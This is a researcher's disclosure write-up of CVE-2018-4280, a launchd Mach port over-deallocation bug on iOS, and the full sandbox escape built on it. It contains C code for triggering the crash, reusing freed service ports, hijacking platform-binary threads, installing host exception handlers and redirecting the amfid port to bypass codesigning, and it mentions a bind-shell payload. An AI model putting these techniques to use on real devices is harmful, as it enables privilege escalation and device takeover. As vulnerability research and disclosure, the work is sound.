While researching crash reporting on iOS, I discovered a Mach port replacement vulnerability in launchd. By crashing in a particular way, a process can make the kernel send a Mach message to launchd that causes launchd to over-deallocate a send right to a Mach port in its IPC namespace. This allows an attacker to impersonate any launchd service it can look up to the rest of the system, which opens up numerous avenues to privilege escalation.

This vulnerability is also present on macOS, but triggering the vulnerability on iOS is more difficult due to checks in launchd that ensure that the Mach exception message comes from the kernel.

CVE-2018-4280: launchd Mach port over-deallocation while handling EXC_CRASH exception messages

Launchd multiplexes multiple different Mach message handlers over its main port, including a MIG handler for exception messages. If a process sends a mach_exception_raise or mach_exception_raise_state_identity message to its own bootstrap port, launchd will receive and process that message as a host-level exception.

Unfortunately, launchd’s handling of these messages is buggy. If the exception type is EXC_CRASH, then launchd will deallocate the thread and task ports sent in the message and then return KERN_FAILURE from the service routine, causing the MIG system to deallocate the thread and task ports again. (The assumption is that if a service routine returns success, then it has taken ownership of all resources in the Mach message, while if the service routine returns an error, then it has taken ownership of none of the resources.)

Here is the code from launchd’s service routine for mach_exception_raise messages, decompiled using IDA/Hex-Rays and lightly edited for readability:

kern_return_t __fastcall
catch_mach_exception_raise(                             // (a) The service routine is
        mach_port_t            exception_port,          //     called with values directly
        mach_port_t            thread,                  //     from the Mach message
        mach_port_t            task,                    //     sent by the client. The
        exception_type_t       exception,               //     thread and task ports could
        mach_exception_data_t  code,                    //     be arbitrary send rights.
        mach_msg_type_number_t codeCnt)
{
    __int64 __stack_guard;                 // ST28_8@1
    kern_return_t kr;                      // w0@1 MAPDST
    kern_return_t result;                  // w0@4
    __int64 codes_left;                    // x25@6
    mach_exception_data_type_t code_value; // t1@7
    int pid;                               // [xsp+34h] [xbp-44Ch]@1
    char codes_str[1024];                  // [xsp+38h] [xbp-448h]@7

    __stack_guard = *__stack_chk_guard_ptr;
    pid = -1;
    kr = pid_for_task(task, &pid);
    if ( kr )
    {
        _os_assumes_log(kr);
        _os_avoid_tail_call();
    }
    if ( current_audit_token.val[5] )                   // (b) If the message was sent by
    {                                                   //     a process with a nonzero PID
        result = KERN_FAILURE;                          //     (any non-kernel process),
    }                                                   //     the message is rejected.
    else
    {
        if ( codeCnt )
        {
            codes_left = codeCnt;
            do
            {
                code_value = *code;
                ++code;
                __snprintf_chk(codes_str, 0x400uLL, 0, 0x400uLL, "0x%llx", code_value);
                --codes_left;
            }
            while ( codes_left );
        }
        launchd_log_2(
            0LL,
            3LL,
            "Host-level exception raised: pid = %d, thread = 0x%x, "
                "exception type = 0x%x, codes = { %s }",
            pid,
            thread,
            exception,
            codes_str);
        kr = deallocate_port(thread);                   // (c) The "thread" port sent in
        if ( kr )                                       //     the message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        kr = deallocate_port(task);                     // (d) The "task" port sent in the
        if ( kr )                                       //     message is deallocated.
        {
            _os_assumes_log(kr);
            _os_avoid_tail_call();
        }
        if ( exception == EXC_CRASH )                   // (e) If the exception type is
            result = KERN_FAILURE;                      //     EXC_CRASH, then KERN_FAILURE
        else                                            //     is returned. MIG will
            result = 0;                                 //     deallocate the ports again.
    }
    *__stack_chk_guard_ptr;
    return result;
}

This is what the code does:

  1. This function is the Mach service routine for mach_exception_raise exception messages: it gets invoked directly by the Mach system when launchd processes a mach_exception_raise Mach exception message. The arguments to the service routine are parsed from the Mach message, and hence are controlled by the message’s sender.
  2. At (b), launchd checks that the Mach exception message was sent by the kernel. The sender’s audit token contains the PID of the sending process in field 5, which will only be zero for the kernel. If the message wasn’t sent by the kernel, it is rejected.
  3. The thread and task ports from the message are explicitly deallocated at (c) and (d).
  4. At (e), launchd checks whether the exception type is EXC_CRASH, and returns KERN_FAILURE if so. The intent is to make sure not to handle EXC_CRASH messages, presumably so that ReportCrash is invoked as the corpse handler. However, returning KERN_FAILURE at this point will cause the task and thread ports to be deallocated again when the exception message is cleaned up later. This means those two ports will be over-deallocated.

In order for this vulnerability to be useful, we will want to free launchd’s send right to a Mach service it vends, so that we can then impersonate that service to the rest of the system. This means that we’ll need the task and thread ports in the exception message to really be send rights to the Mach service port we want to free in launchd. Then, once we’ve sent launchd the malicious exception message and freed the service port, we will try to get that same port name reused, but this time for a Mach port to which we hold the receive right. That way, when a client asks launchd to give them a send right to the Mach port for the service, launchd will instead give them a send right to our port, letting us impersonate that service to the client. After that, there are many different routes to gain system privileges.

Triggering the vulnerability

In order to actually trigger the vulnerability, we’ll need to bypass the check that the message was sent by the kernel. This is because if we send the exception message to launchd directly it will just be discarded. Somehow, we need to get the kernel to send a «malicious» exception message containing a Mach send right for a system service instead of the real thread and task ports.

As it turns out, there is a Mach trap, task_set_special_port, that can be used to set a custom send right to be used in place of the true task port in certain situations. One of these situations is when the kernel generates an exception message on behalf of a task: instead of placing the true task send right in the exception message, the kernel will use the send right supplied by task_set_special_port. More specifically, if a task calls task_set_special_port to set a custom value for its TASK_KERNEL_PORT special port and then the task crashes, the exception message generated by the kernel will have a send right to the custom port, not the true task port, in the «task» field. An equivalent API, thread_set_special_port, can be used to set a custom port in the «thread» field of the generated exception message.

Because of this behavior, it’s actually not difficult at all to make the kernel generate a «malicious» exception message containing a Mach service port in place of the task and thread port. However, we still need to ensure that the exception message that we generate gets delivered to launchd.

Once again, making sure the kernel delivers the «malicious» exception message to launchd isn’t difficult if you know the right API. The function thread_set_exception_ports will set any Mach send right as the port to which exception messages on this thread are delivered. Thus, all we need to do is invoke thread_set_exception_ports with the bootstrap port, and then any exception we generate will cause the kernel to send an exception message to launchd.

The last piece of the puzzle is getting the right exception type. The vulnerability will only be triggered for EXC_CRASH exceptions. A little trial and error reveals that we can easily generate EXC_CRASH exceptions by calling the standard abort function.

Thus, in summary, we can use existing and well-documented APIs to make the kernel generate a malicious EXC_CRASH exception message on our behalf and deliver it to launchd, triggering the vulnerability and freeing the Mach service port (a rough C sketch follows the list below):

  1. Use thread_set_exception_ports to set launchd as the exception handler for this thread.
  2. Call bootstrap_look_up to get the service port for the service we want to impersonate from launchd.
  3. Call task_set_special_port/thread_set_special_port to use that service port instead of the true task and thread ports in exception messages.
  4. Call abort. The kernel will send an EXC_CRASH exception message to launchd, but the task and thread ports in the message will be the target service port.
  5. Launchd will process the exception message and free the service port.
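
As a rough illustration of the crasher’s side of those steps (not the exploit’s actual code; the service name is a placeholder and error handling is omitted):

#include <mach/mach.h>
#include <servers/bootstrap.h>
#include <stdlib.h>

static void crash_with_service_port(const char *service_name)
{
    mach_port_t service = MACH_PORT_NULL;

    /* 1. Deliver this thread's EXC_CRASH exceptions to launchd as ordinary
     *    mach_exception_raise messages. */
    thread_set_exception_ports(mach_thread_self(), EXC_MASK_CRASH,
            bootstrap_port, EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES,
            THREAD_STATE_NONE);

    /* 2. Look up the service whose send right we want launchd to
     *    over-deallocate. */
    bootstrap_look_up(bootstrap_port, service_name, &service);

    /* 3. Make the kernel put that send right into the "task" and "thread"
     *    fields of any exception message it generates for us. */
    task_set_special_port(mach_task_self(), TASK_KERNEL_PORT, service);
    thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, service);

    /* 4. Generate an EXC_CRASH; launchd deallocates the service port once
     *    explicitly and once more via MIG when its service routine returns
     *    KERN_FAILURE. */
    abort();
}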

Running code after the crash

There’s a problem with the above strategy: calling abort will kill our process. If we want to be able to run any code at all after triggering the vulnerability, we need a way to perform the crash in another process.

(With other exception types a process could actually recover from the exception. The way a process would recover is to set its thread exception handler to be launchd and its task exception handler to be itself. After launchd processes and fails to handle the exception, the kernel would send the exception to the task handler, which would reset the thread state and inform the kernel that the exception has been handled. However, a process cannot catch its own EXC_CRASH exceptions, so we do need two processes.)

One strategy is to first exploit a vulnerability in another process on iOS and force that process to set its kernel ports and crash. However, for a proof-of-concept, it’s easier to create an app extension.

App extensions, introduced in iOS 8, provide a way to package some functionality of an application so it is available outside of the application. The code of an app extension runs in a separate, sandboxed process. This makes it very easy to launch a process that will set its special ports, register launchd as its exception handler for EXC_CRASH, and then call abort.

There is no supported way for an app to programmatically launch its own app extension and talk to it. However, Ian McDowell wrote a great article describing how to use the private NSExtension API to launch and communicate with an app extension process. I’ve used an almost identical strategy here. The only difference is that we need to communicate a Mach port to the app extension process, which involves registering a dummy service with launchd to which the app extension connects.

Preventing port reuse in launchd

One challenge you would notice if you ran the exploit as described is that occasionally you would not be able to reacquire the freed port. The reason for this is that the kernel tracks a process’s free IPC entries in a freelist, and so a just-freed port name will be reused (with a different generation number) when a new port is allocated in the IPC table. Thus, we will only reallocate the port name we want if launchd doesn’t reuse that IPC entry slot for another port first.

The way around this is to bury the free IPC entry slot down the freelist, so that if launchd allocates new ports those other slots will be used first. How do we do this? We can register a bunch of dummy Mach services in launchd with ports to which we hold the receive right. When we call abort, the exception handler will fire first, and then the process state, including the Mach ports, will be cleaned up. When launchd receives the EXC_CRASH exception it will inadvertently free the target service port, placing the IPC entry slot corresponding to that port name at the head of the freelist. Then, when the rest of our app extension’s Mach ports are destroyed, launchd will receive notifications and free the dummy service ports, burying the target IPC entry slot behind the slots for the just-freed ports. Thus, as long as launchd allocates fewer ports than the number of dummy services we registered, the target slot will still be on the freelist, meaning we can still cause launchd to reallocate the slot with the same port name as the original service.

The limitation of this strategy is that we need the com.apple.security.application-groups entitlement in order to register services with launchd. There are other ways to stash Mach ports in launchd, but using application groups is certainly the easiest, and suffices for this proof-of-concept.

Impersonating the freed service

Once we have spawned the crasher app extension and freed a Mach send right in launchd, we need to reallocate that Mach port name with a send right to which we hold the receive right. That way, any messages launchd sends to that port name will be received by us, and any time launchd shares that port name with a client, the client will receive a send right to our port. In particular, if we can free launchd’s send right to a Mach service, then any process that requests that service from launchd will receive a send right to our own port instead of the real service port. This allows us to impersonate the service or perform a man-in-the-middle attack, inspecting all messages that the client sends to the service.

Getting the freed port name reused so that it refers to a port we own is also quite simple, given that we’ve already decided to use the application-groups entitlement: just register dummy Mach services with launchd until one of them reuses the original port name. We’ll need to do it in batches, registering a large number of dummy services together, checking to see if any has successfully reused the freed port name, and then deregistering them. The reason is that we need to be sure that our registrations go all the way back in the IPC port freelist to recover the buried port name we want.

We can check whether we’ve managed to successfully reuse the freed port name by looking up the original service with bootstrap_look_up: if it returns one of our registered service ports, we’re done.
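For concreteness, here is a minimal sketch of that loop (not blanket’s actual code; the dummy service names are hypothetical and would need to carry the application group prefix, and the real exploit also deregisters each batch before trying again):

#include <mach/mach.h>
#include <servers/bootstrap.h>
#include <stdbool.h>
#include <stdio.h>

/* Register a batch of dummy services, then check whether looking up the
 * freed target service now hands back a port we hold the receive right to. */
static bool batch_reused_target(const char *target_service, size_t batch_size) {
	for (size_t i = 0; i < batch_size; i++) {
		char name[128];
		snprintf(name, sizeof(name), "group.com.example.dummy.%zu", i);
		mach_port_t port = MACH_PORT_NULL;
		mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
		mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
		bootstrap_register(bootstrap_port, name, port);	/* deprecated, but still present */
	}
	mach_port_t service = MACH_PORT_NULL;
	bootstrap_look_up(bootstrap_port, target_service, &service);
	/* If we hold the receive right for the name launchd returned, one of our
	 * dummy ports was handed out under the target's original port name. */
	mach_port_type_t type = 0;
	mach_port_type(mach_task_self(), service, &type);
	return (type & MACH_PORT_TYPE_RECEIVE) != 0;
}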

Once we’ve managed to register a new service that gets the same port name as the original, any clients that look up the original service in launchd will be given a send right to our port, not the real service port. Thus, we are effectively impersonating the original service to the rest of the system (or at least, to those processes that look up the service after our attack).

Stage 1: Obtaining the host-priv port

Once we have the capability to impersonate arbitrary system services, the next step is to obtain the host-priv port. This step is straightforward, and is not affected by the changes in iOS 11.3. The high-level idea of this attack is to impersonate SafetyNet, crash ReportCrash, and then retrieve the host-priv port from the dying ReportCrash task port sent in the exception message.

About ReportCrash and SafetyNet

ReportCrash is responsible for generating crash reports on iOS. This one binary actually vends 4 different services (each in a different process, although not all may be running at any given time):

  1. com.apple.ReportCrash is responsible for generating crash reports for crashing processes. It is the host-level exception handler for EXC_CRASH, EXC_GUARD, and EXC_RESOURCE exceptions.
  2. com.apple.ReportCrash.Jetsam handles Jetsam reports.
  3. com.apple.ReportCrash.SimulateCrash creates reports for simulated crashes.
  4. com.apple.ReportCrash.SafetyNet is the registered exception handler for the com.apple.ReportCrash service.

The ones of interest to us are com.apple.ReportCrash and com.apple.ReportCrash.SafetyNet, hereafter referred to simply as ReportCrash and SafetyNet. Both of these are MIG-based services, and they run effectively the same code.

When ReportCrash starts up, it looks up the SafetyNet service in launchd and sets the returned port as the task-level exception handler. The intent seems to be that if ReportCrash itself were to crash, a separate process would generate the crash report for it. However, this code path looks defunct: ReportCrash registers SafetyNet for mach_exception_raise messages, even though both ReportCrash and SafetyNet only handle mach_exception_raise_state_identity messages. Nonetheless, both services are still present and reachable from within the iOS container sandbox.

ReportCrash manipulation primitives

In order to carry out the following attack, we need to be able to manipulate ReportCrash (or SafetyNet) to behave in the way we want. Specifically, we need the following capabilities: start ReportCrash on demand, force ReportCrash to exit, crash ReportCrash, and make sure that ReportCrash doesn’t exit while we’re using it. Here I’ll describe how we achieve each objective.

In order to start ReportCrash, we simply need to send it a Mach message: launchd will start it on demand. However, due to its peculiar design, any message type except mach_exception_raise_state_identity will cause ReportCrash to stop responding to new messages and eventually exit. Thus, we need to send a mach_exception_raise_state_identity message if we want it to stay alive afterwards.

In order to exit ReportCrash, we can simply send it any other type of Mach message.
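For concreteness, a minimal sketch of this «poke» primitive (names are mine; the message ID is arbitrary, and any ID that isn’t a mach_exception_raise_state_identity request works for the exit case):

#include <mach/mach.h>
#include <servers/bootstrap.h>

/* Send a trivial, header-only Mach message to a launchd-hosted service,
 * starting it on demand if it isn't already running. */
static kern_return_t poke_service(const char *service_name) {
	mach_port_t service = MACH_PORT_NULL;
	kern_return_t kr = bootstrap_look_up(bootstrap_port, service_name, &service);
	if (kr != KERN_SUCCESS)
		return kr;
	mach_msg_header_t msg = { 0 };
	msg.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
	msg.msgh_size        = sizeof(msg);
	msg.msgh_remote_port = service;
	msg.msgh_id          = 0x12345678;	/* arbitrary, unrecognized message ID */
	return mach_msg(&msg, MACH_SEND_MSG, sizeof(msg), 0,
	                MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}

Calling poke_service("com.apple.ReportCrash") therefore both starts the service on demand and, because the ID is unrecognized, causes a running instance to wind down.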

There are many ways to crash ReportCrash. The easiest is probably to send a mach_exception_raise_state_identity message with the thread port set to MACH_PORT_NULL.

Finally, we need to ensure that ReportCrash does not exit while we’re using it. Each mach_exception_raise_state_identity message that it processes causes it to spin off another thread to listen for the next message while the original thread generates the crash report. ReportCrash will exit once all of the outstanding threads generating a crash report have finished. Thus, if we can stall one of those threads while it is in the process of generating a crash report, we can keep it from ever exiting.

The easiest way I found to do that was to send a mach_exception_raise_state_identity message with a custom port in the task and thread fields. Once ReportCrash tries to generate a crash report, it will call task_policy_get on the «task» port, which will cause it to send a Mach message to the port that we sent and await a reply. But since the «task» port is just a regular old Mach port, we can simply not reply to the Mach message, and ReportCrash will wait indefinitely for task_policy_get to return.

Extracting host-priv from ReportCrash

For the first stage of the exploit, the attack plan is relatively straightforward:

  1. Start the SafetyNet service and force it to stay alive for the duration of our attack.
  2. Use the launchd service impersonation primitive to impersonate SafetyNet. This gives us a new port on which we can receive messages intended for the real SafetyNet service.
  3. Make any existing instance of ReportCrash exit. That way, we can ensure that ReportCrash looks up our SafetyNet port in the next step.
  4. Start ReportCrash. ReportCrash will look up SafetyNet in launchd and set the resulting port, which is the fake SafetyNet port for which we own the receive right, as the destination for EXC_CRASH messages.
  5. Trigger a crash in ReportCrash. After seeing that there are no registered handlers for the original exception type, ReportCrash will enter the process death phase. At this point XNU will see that ReportCrash registered the fake SafetyNet port to receive EXC_CRASH exceptions, so it will generate an exception message and send it to that port.
  6. We then listen on the fake SafetyNet port for the EXC_CRASH message. It will be of type mach_exception_raise, which means it will contain ReportCrash’s task port.
  7. Finally, we use task_get_special_port on the ReportCrash task port to get ReportCrash’s host port. Since ReportCrash is unsandboxed and runs as root, this is the host-priv port.

At the end of this stage of the sandbox escape, we end up with a usable host-priv port. This alone demonstrates that this is a serious security issue.
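Step 7 above boils down to a single call. A minimal sketch, assuming the EXC_CRASH message has already been received and the dying ReportCrash task port saved (the variable name is mine):

#include <mach/mach.h>

/* ReportCrash runs unsandboxed as root, so its TASK_HOST_PORT special port
 * is the host-priv port rather than the unprivileged host port. */
static mach_port_t host_priv_from_report_crash(task_t report_crash_task) {
	mach_port_t host = MACH_PORT_NULL;
	kern_return_t kr = task_get_special_port(report_crash_task, TASK_HOST_PORT, &host);
	return (kr == KERN_SUCCESS) ? host : MACH_PORT_NULL;
}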

Stage 2: Escaping the sandbox

Even though we have the host-priv port, our goal is to fully escape the sandbox and run code as root with the task_for_pid-allow entitlement. The first step in achieving that is to simply escape the sandbox.

Technically speaking there’s no reason we need to obtain the host-priv port before escaping the sandbox: these two steps are independent and can occur in either order. However, this stage will leave the system unstable if it or subsequent stages fail, so it’s worth putting later.

The high-level attack is to use the same launchd vulnerability again to impersonate a system service. However, this time our goal is to impersonate a service to which a client will send its task port in a Mach message. It’s easy to find by experimentation on iOS 11.2.6 that if we impersonate com.apple.CARenderServer (hereafter CARenderServer) hosted by backboardd and then communicate with com.apple.DragUI.druid.source, the unsandboxed druid daemon will send its task port in a Mach message to the fake service port.

This step of the exploit is broken on iOS 11.3 because druid no longer sends its task port in the Mach message to CARenderServer. Despite this, I’m confident that this vulnerability can still be used to escape the sandbox. One way to go about this is to look for unsandboxed services that trust input from other services. These types of «vulnerabilities» would never be exploitable without the capability to replace system services, which means they are probably a low-priority attack surface, both internally and externally to Apple.

Crashing druid

Just like with ReportCrash, we need to be able to force druid to restart in case it is already running so that it looks up our fake CARenderServer port in launchd. For this purpose, I decided to use a bug in libxpc that was already scheduled to be fixed.

While looking through libxpc, I found an out-of-bounds read that could be used to force any XPC service to crash:

void _xpc_dictionary_apply_wire_f
(
        OS_xpc_dictionary *xdict,
        OS_xpc_serializer *xserializer,
        const void *context,
        bool (*applier_fn)(const char *, OS_xpc_serializer *, const void *)
)
{
...
    uint64_t count = (unsigned int)*serialized_dict_count;
    if ( count )
    {
        uint64_t depth = xserializer->depth;
        uint64_t index = 0;
        do
        {
            const char *key = _xpc_serializer_read(xserializer, 0, 0, 0);
            size_t keylen = strlen(key);
            _xpc_serializer_advance(xserializer, keylen + 1);
            if ( !applier_fn(key, xserializer, context) )
                break;
            xserializer->depth = depth;
            ++index;
        }
        while ( index < count );
    }
...
}

The problem is that the use of an unchecked strlen on attacker-controlled data allows the key for the serialized dictionary entry to extend beyond the end of the data buffer. This means the XPC service deserializing the dictionary will crash, either when strlen dereferences out-of-bounds memory or when _xpc_serializer_advance tries to advance the serializer past the end of the supplied data.

This bug was already fixed in iOS 11.3 Beta by the time I discovered it, so I did not report it to Apple. The exploit is available as an independent project in my xpc-crash repository.

In order to use this bug to crash druid, we simply need to send the druid service a malformed XPC message such that the dictionary’s key is unterminated and extends to the last byte of the message.

Obtaining druid’s task port

Obtaining druid’s task port on iOS 11.2.6 using our service impersonation primitive is easy:

  1. Use the Mach service impersonation capability to impersonate CARenderServer.
  2. Send a message to the druid service so that it starts up.
  3. If we don’t get druid’s task port after a few seconds, kill druid using the XPC bug and restart it.
  4. Druid will send us its task port on the fake CARenderServer port.

Getting around the platform binary task port restrictions

Once we have druid’s task port, we still need to figure out how to execute code inside the druid process.

The problem is that XNU protects task ports for platform binaries from being modified by non-platform binaries. The defense is implemented in the function task_conversion_eval, which is called by convert_port_to_locked_task and convert_port_to_task_with_exec_token:

kern_return_t
task_conversion_eval(task_t caller, task_t victim)
{
	/*
	 * Tasks are allowed to resolve their own task ports, and the kernel is
	 * allowed to resolve anyone's task port.
	 */
	if (caller == kernel_task) {
		return KERN_SUCCESS;
	}

	if (caller == victim) {
		return KERN_SUCCESS;
	}

	/*
	 * Only the kernel can can resolve the kernel's task port. We've established
	 * by this point that the caller is not kernel_task.
	 */
	if (victim == kernel_task) {
		return KERN_INVALID_SECURITY;
	}

#if CONFIG_EMBEDDED
	/*
	 * On embedded platforms, only a platform binary can resolve the task port
	 * of another platform binary.
	 */
	if ((victim->t_flags & TF_PLATFORM) && !(caller->t_flags & TF_PLATFORM)) {
#if SECURE_KERNEL
		return KERN_INVALID_SECURITY;
#else
		if (cs_relax_platform_task_ports) {
			return KERN_SUCCESS;
		} else {
			return KERN_INVALID_SECURITY;
		}
#endif /* SECURE_KERNEL */
	}
#endif /* CONFIG_EMBEDDED */

	return KERN_SUCCESS;
}

MIG conversion routines that rely on these functions, including convert_port_to_task and convert_port_to_map, will thus fail when we call them on druid’s task. For example, mach_vm_write won’t allow us to manipulate druid’s memory.

However, while looking at the MIG file osfmk/mach/task.defs in XNU, I noticed something interesting:

/*
 *	Returns the set of threads belonging to the target task.
 */
routine task_threads(
		target_task	: task_inspect_t;
	out	act_list	: thread_act_array_t);

The function task_threads, which enumerates the threads in a task, actually takes a task_inspect_t rather than a task_t, which means MIG converts it using convert_port_to_task_inspect rather than convert_port_to_task. A quick look at convert_port_to_task_inspect reveals that this function does not perform the task_conversion_eval check, meaning we can call it successfully on platform binaries. This is interesting because the returned threads are not thread_inspect_t rights, but rather full thread_act_t rights. Put another way, task_threads promotes a non-modifiable task right into modifiable thread rights. And since there’s no equivalent thread_conversion_eval, this means we can use the Mach thread APIs to modify the threads in a task even if that task is a platform binary.
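A short sketch of what this loophole buys us, assuming an arm64 target and that druid_task is the (inspect-only) task port we received (error handling and cleanup omitted):

#include <mach/mach.h>

/* task_threads succeeds even where task_conversion_eval would block us, and
 * the returned thread_act_t rights accept thread_get_state/thread_set_state. */
static kern_return_t grab_first_thread_state(mach_port_t druid_task) {
	thread_act_array_t threads = NULL;
	mach_msg_type_number_t count = 0;
	kern_return_t kr = task_threads(druid_task, &threads, &count);
	if (kr != KERN_SUCCESS || count == 0)
		return kr;
	arm_thread_state64_t state;
	mach_msg_type_number_t state_count = ARM_THREAD_STATE64_COUNT;
	kr = thread_get_state(threads[0], ARM_THREAD_STATE64, (thread_state_t)&state, &state_count);
	/* ...modify registers and call thread_set_state() to hijack execution... */
	return kr;
}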

In order to take advantage of this, I wrote a library called threadexec which builds a full-featured function call capability on top of the Mach threads API. The threadexec project in and of itself was a significant undertaking, but as it is only indirectly relevant to this exploit, I will forego a detailed explanation of its inner workings.

Stage 3: Installing a new host-level exception handler

Once we have the host-priv port and unsandboxed code execution inside of druid, the next stage of the full sandbox escape is to install a new host-level exception handler. This process is straightforward given our current capabilities:

  1. Get the current host-level exception handler for EXC_BAD_ACCESS by calling host_get_exception_ports.
  2. Allocate a Mach port that will be the new host-level exception handler for EXC_BAD_ACCESS.
  3. Send the host-priv port and a send right to the Mach port we just allocated over to druid.
  4. Using our execution context in druid, make druid call host_set_exception_ports to register our Mach port as the host-level exception handler for EXC_BAD_ACCESS.

After this stage, any time a process accesses an invalid memory address (and also does not have a registered exception handler), an EXC_BAD_ACCESS exception message will be sent to our new exception handler port. This will give us the task port of any crashing process, and since EXC_BAD_ACCESS is a recoverable exception, this time we can use the task port to execute code.
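A rough sketch of the call druid is made to perform (in blanket it executes remotely via threadexec, and the exact behavior and flavor constants may differ):

#include <mach/mach.h>

/* Register new_handler as the host-level handler for EXC_BAD_ACCESS. The old
 * handler, previously saved with host_get_exception_ports, is restored later. */
static kern_return_t install_host_handler(host_priv_t host_priv, mach_port_t new_handler) {
	return host_set_exception_ports(host_priv,
	                                EXC_MASK_BAD_ACCESS,
	                                new_handler,
	                                EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES,
	                                ARM_THREAD_STATE64);	/* flavor is unused with the DEFAULT behavior */
}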

Stage 4: Getting ReportCrash’s task port

The next stage is to trigger an EXC_BAD_ACCESS exception in ReportCrash so that its task port gets sent in an exception message to our new exception handler port:

  1. Crash ReportCrash using the previously described technique. This will cause ReportCrash to generate an EXC_BAD_ACCESS exception. Since ReportCrash has no exception handler registered for EXC_BAD_ACCESS (remember SafetyNet is registered for EXC_CRASH), the exception will be delivered to the host-level exception handler.
  2. Listen for exception messages on our host exception handler port.
  3. When we receive the exception message for ReportCrash, save the task and thread ports. Suspend the crashing thread and return KERN_SUCCESS to indicate to the kernel that the exception has been handled and ReportCrash can be resumed.
  4. Use the task and thread ports to establish an execution context inside ReportCrash just like we did with druid.

At this point, we have code execution inside an unsandboxed, root, task_for_pid-allow process.

Stage 5: Restoring the original host-level exception handler

The next two stages aren’t strictly necessary but should be performed anyway.

Once we have code execution inside ReportCrash, we should reset the host-level exception handler for EXC_BAD_ACCESS using druid:

  1. Send the old host-level exception handler port over to druid.
  2. Call host_set_exception_ports in druid to re-register the old host-level exception handler for EXC_BAD_ACCESS.

This will stop our exception handler port from receiving exception messages for other crashing processes.

Stage 6: Fixing up launchd

The last step is to restore the damage we did to launchd when we freed service ports in its IPC namespace in order to impersonate them:

  1. Call task_for_pid in ReportCrash to get launchd’s task port.
  2. For each service we impersonated:
    1. Get launchd’s name for the send right to the fake service port. This is the original name of the real service port.
    2. Destroy the fake service port, deregistering the fake service with launchd.
    3. Call mach_port_insert_right in ReportCrash to push the real service port into launchd’s IPC space under the original name.

After this step is done, the system should once again be fully functional. After successful exploitation, there should be no need to force reset the device, since the exploit repairs all the damages itself.
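Step 2.3 is a single Mach call once we hold launchd’s task port; a sketch of its shape (in practice it runs inside ReportCrash via the injected execution context, since only a platform binary may use launchd’s task port):

#include <mach/mach.h>

/* Push a send right to the real service port back into launchd's IPC space
 * under the name the service originally occupied. */
static kern_return_t restore_service_port(task_t launchd_task,
                                          mach_port_name_t original_name,
                                          mach_port_t real_service_port) {
	return mach_port_insert_right(launchd_task, original_name,
	                              real_service_port, MACH_MSG_TYPE_COPY_SEND);
}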

Post-exploitation

Blanket also packages a post-exploitation payload that bypasses amfid and spawns a bind shell. This section will describe how that is achieved.

Spawning a payload process

Even after gaining code execution in ReportCrash, using that capability is not easy: we are limited to performing individual function calls from within the process, which makes it painful to perform complex tasks. Ideally, we’d like a way to run code natively with ReportCrash’s privileges, either by injecting code into ReportCrash or by spawning a new process with the same (or higher) privileges.

Blanket chooses the process spawning route. We use task_for_pid and our platform binary status in ReportCrash to get launchd’s task port and create a new thread inside of launchd that we can control. We then use that thread to call posix_spawn to launch our payload binary. The payload binary can be signed with restricted entitlements, including task_for_pid-allow, to grant additional capabilities.

Bypassing amfid

In order for iOS to accept our newly spawned binary, we need to bypass codesigning. Various strategies have been discussed over the years, but the most common current strategy is to register an exception handler for amfid and then perform a data patch so that amfid crashes when trying to call MISValidateSignatureAndCopyInfo. This allows us to fake the implementation of that function to pretend that the code signature is valid.

However, there’s another approach which I believe is more robust and flexible: rather than patching amfid at all, we can simply register a new amfid port in the kernel.

The kernel keeps track of which port to send messages to amfid using a host special port called HOST_AMFID_PORT. If we have unsandboxed root code execution, we can set this port to a new value. Apple has protected against this attack by checking whether the reply to a validation request really came from amfid: the cdhash of the sender is compared to amfid’s cdhash. However, this doesn’t actually prevent the message from being sent to a process other than amfid; it only prevents the reply from coming from a non-amfid process. If we set up a triangle where the kernel sends messages to us, we generate the reply and pass it to amfid, and then amfid sends the reply to the kernel, then we’ll be able to bypass the sender check.
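A rough sketch of the port swap (HOST_AMFID_PORT lives in XNU’s private host_special_ports.h header, not the public SDK, so the definition below is an assumption for illustration):

#include <mach/mach.h>

#ifndef HOST_AMFID_PORT
#define HOST_AMFID_PORT 18	/* assumed value from XNU's host_special_ports.h */
#endif

/* Save the real amfid port (so verified replies can still be relayed through
 * amfid itself, satisfying the kernel's cdhash check on the sender), then
 * point the kernel's amfid special port at a port we control. */
static kern_return_t take_over_amfid_port(host_priv_t host_priv, mach_port_t our_port,
                                          mach_port_t *real_amfid_port) {
	kern_return_t kr = host_get_special_port(host_priv, HOST_LOCAL_NODE,
	                                         HOST_AMFID_PORT, real_amfid_port);
	if (kr != KERN_SUCCESS)
		return kr;
	return host_set_special_port(host_priv, HOST_AMFID_PORT, our_port);
}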

There are numerous advantages to this approach, of which the biggest is probably access to additional flags in the verify_code_directory service routine. Even though amfid does not use them all, there are many other output flags that amfid could set to control the behavior of codesigning. Here’s a partial prototype of verify_code_directory:

kern_return_t
verify_code_directory(
		mach_port_t    amfid_port,
		amfid_path_t   path,
		uint64_t       file_offset,
		int32_t        a4,
		int32_t        a5,
		int32_t        a6,
		int32_t *      entitlements_valid,
		int32_t *      signature_valid,
		int32_t *      unrestrict,
		int32_t *      signer_type,
		int32_t *      is_apple,
		int32_t *      is_developer_code,
		amfid_a13_t    a13,
		amfid_cdhash_t cdhash,
		audit_token_t  audit);

Of particular interest for jailbreak developers is the is_apple parameter. This parameter does not appear to be used by amfid, but if set, it will cause the kernel to set the CS_PLATFORM_BINARY codesigning flag, which grants the application platform binary privileges. In particular, this means that the application can now use task ports to modify platform binaries directly.

Loopholes used in this attack

This attack takes advantage of several loopholes that aren’t security vulnerabilities themselves but do minimize the effectiveness of various exploit mitigations. Not all of these need to be closed together, since some are partially redundant, but it’s worth listing them all anyway.

In the kernel:

  1. task_threads can promote an inspect-only task_inspect_t to a modify-capable thread_act_t.
  2. There is no thread_conversion_eval to perform the role of task_conversion_eval for threads.
  3. A non-platform binary may use a task_inspect_t right for a platform binary.
  4. Exception messages for unsandboxed processes may be delivered to sandboxed processes, even though that provides a way to escape the sandbox. It’s not clear whether there is a clean fix for this loophole.
